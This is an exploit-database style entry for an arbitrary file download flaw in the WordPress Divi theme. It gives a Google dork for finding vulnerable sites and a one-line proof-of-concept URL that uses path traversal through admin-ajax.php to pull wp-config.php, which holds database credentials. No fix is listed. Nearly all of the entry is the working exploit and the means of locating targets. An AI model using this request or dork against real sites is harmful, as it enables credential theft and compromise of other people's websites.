Wordpress Theme Divi Arbitrary File Download Vulnerability

2015-02-09 17:05:03

# Exploit Title: Wordpress Theme Divi Arbitrary File Download Vulnerability
# Date: 08/02/2015
# Exploit Author: pool and Fran_73
# Vendor Homepage: http://www.elegantthemes.com/gallery/divi/
# Contact : [email protected] ( YM )
# Tested on: Linux / Window
# Google Dork: inurl:wp-content/themes/Divi/
######################
# PoC
http://target/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

Fixes

No fixes

In order to submit a new fix you need to be registered.